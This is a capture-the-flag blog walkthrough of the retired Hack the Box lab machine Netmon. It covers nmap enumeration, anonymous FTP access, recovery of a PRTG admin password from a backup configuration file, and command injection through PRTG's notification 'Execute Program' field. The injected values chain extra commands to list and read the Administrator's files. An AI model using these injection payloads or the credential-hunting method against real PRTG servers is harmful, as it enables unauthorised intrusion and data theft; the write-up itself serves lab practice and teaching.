2 min read

Hack the Box - Netmon

Hi guys,

Today Netmon retired and this is how I get in to the machine. It was rated as the easiest machine in Hack the Box so let's start.

Information

  • OS: Windows
  • IP: 10.10.10.152
  • Difficulty: Easy

Enumeration

First I did some nmap scan to get some information of machine. The result showed that it was a Windows machine which had some ports opened.

# nmap -sV -sC -A -Pn 10.10.10.152
Starting Nmap 7.30 ( https://nmap.org ) art 2019-05-20 13:56 KST
Nmap scan report for 10.10.10.152
Host is up (0.30s latency).
Not shown: 995 closed ports
PORT    STATE   SERVICE     VERSION
21/tcp  open    ftp         Microsoft ftpd
| ftp-anon: Anonymous FTP lgoin allowed (FTP code 230)
| 02-03-19 12:18AM                  2024 .rnd
| 02-05-19 10:15PM      <DIR>            inetpub
| 07-16-16 09:18AM      <DIR>            PerfLogs
| 02-25-19 10:56PM      <DIR>            Program Files
| 02-03-19 12:28AM      <DIR>            Program Files (x86)
| 02-03-19 08:08AM      <DIR>            Users
| 02-25-19 11:49PM      <DIR>            Windows
80/tcp  open    http        Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open    msrpc       Microsoft Windows RPC
139/tcp open    netbios-ssn Microsoft Windows netbios-ssn
445/tcp open    microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: 05s: Windows, Windows Server 2008 R2 2012; CPE: cpe:/o:microsoft:windows  

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script result:
| clock-skew:
|_  -1s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 64.75 seconds

Get User flag

The first thing I was looking at was port 21 was opened with anonymous login. So, I tried open it via web browser ftp://10.10.10.152/.

And this was what inside it.

Netmon FTP

I opened the ftp://10.10.10.152/Users/Public/ and there was a user.txt flag. So just download and view the user hash.

Get Root flag

After getting the user hash via FTP, I started checking the port 80 and I got this.

Netmon PRTG

It was kind of Network Monitor so I started searching google for PRTG Default login information. And the default user and password is prtgadmin/prtgadmin. But I could not login with this user.

I started searching for prtg exploit on google and I found this link which is Command Injection vulnerability. However, I needed to login the the dashboard to do so.

Getting login credential

I went back to the FTP service. But this time I logged in using terminal with user Anonymouse and blank password (We can do more thing on terminal than browser xD).

# ftp Anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
229 Entering Extended Passive Mode (|||49870|)
125 Data connection already open; Transfer starting.
11-20-16  10:46PM       <DIR>          $RECYCLE.BIN
02-03-19  12:18AM                 1024 .rnd
11-20-16  09:59PM               389408 bootmgr
07-16-16  09:10AM                    1 BOOTNXT
02-03-19  08:05AM       <DIR>          Documents and Settings
02-25-19  10:15PM       <DIR>          inetpub
06-04-19  08:37AM            738197504 pagefile.sys
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-25-19  10:56PM       <DIR>          ProgramData
02-03-19  08:05AM       <DIR>          Recovery
02-03-19  08:04AM       <DIR>          System Volume Information
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.
ftp> 

After runing ls -a I could see the more hidden directories and it looked interesting.

I checked every directories and found the directory of PRTG which was /ProgramData/Paessler/PRTG\ Network\ Monitor/.

ftp> ls
229 Entering Extended Passive Mode (|||49937|)
125 Data connection already open; Transfer starting.
02-03-19  12:40AM       <DIR>          Configuration Auto-Backups
06-04-19  08:38AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
06-04-19  08:38AM       <DIR>          Logs (Web Server)
02-25-19  08:01PM       <DIR>          Monitoring Database
06-04-19  08:46AM              1198183 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
06-04-19  08:39AM              1647616 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get PRTG\ Configuration.old.bak

I downloaded PRTG Configuration.old.bak and checked what inside the file. Yeah, I found this.

...
<dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
</dbpassword>
...

Test command injection

It must be the password to login to PRTG webpage. But the password was incorrect. So, I tried changing it to PrTg@dmin2019 and it worked xD.

By following this link, I tried execute some command to test if it works or not.

  1. Click on Setup menu.

  2. In Account Settings section, click on Notifications.

  3. Click on any Notification to edit or add new.

  4. Find Execute Program option and turn it on.

  5. Put some command to execute.

    First I used

    output.txt; tree /f C:\Users\Administrator > C:\output.txt

    to check the location of root.txt.

    PRTG Command Injection

  6. Go back to the Notification object page, and click Send test notification.

  7. Select user PRTG System Administrator.

PRTG Command Injection

After that, open ftp://10.10.10.152/. The output.txt file should be here.

Download and view that file.

Folder PATH listing
Volume serial number is 00000200 684B:9CE8
C:\USERS\ADMINISTRATOR
├───Contacts
├───Desktop
|   └───root.txt
├───Documents
├───Downloads
├───Favorites
├───Links
├───Music
├───Pictures
├───Saved Games
├───Searches
└───Videos

So, the root.txt file was located in C:\Users\Administrator\Desktop\root.txt

Getting root flag

I went back to the PRTG dashboard again and edited command in notification to

output.txt; type C:\Users\Administrator\Desktop\root.txt > C:\output.txt

After sending a test notificaton, now I got a root flag in output file.

Edited: I just found this way and it is much easier lolz => Link]

SHARE THIS POST